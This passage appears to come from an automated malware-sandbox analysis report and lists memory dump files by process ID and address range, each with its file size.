                                                        Filesize

                                                        52KB

                                                      • memory/2808-598-0x00007FF8CF380000-0x00007FF8CF399000-memory.dmp
                                                        Filesize

                                                        100KB

                                                      • memory/2808-597-0x00007FF8CF140000-0x00007FF8CF2B1000-memory.dmp
                                                        Filesize

                                                        1.4MB

                                                      • memory/2868-416-0x0000023650A90000-0x0000023650A98000-memory.dmp
                                                        Filesize

                                                        32KB

                                                      • memory/3680-287-0x0000028AF4E80000-0x0000028AF53A6000-memory.dmp
                                                        Filesize

                                                        5.1MB

                                                      • memory/3680-98-0x0000028AF2050000-0x0000028AF2068000-memory.dmp
                                                        Filesize

                                                        96KB

                                                      • memory/3680-103-0x0000028AF4680000-0x0000028AF4842000-memory.dmp
                                                        Filesize

                                                        1.8MB

                                                      • memory/4600-96-0x0000019F56800000-0x0000019F56822000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/4684-138-0x0000022DDE7C0000-0x0000022DDE836000-memory.dmp
                                                        Filesize

                                                        472KB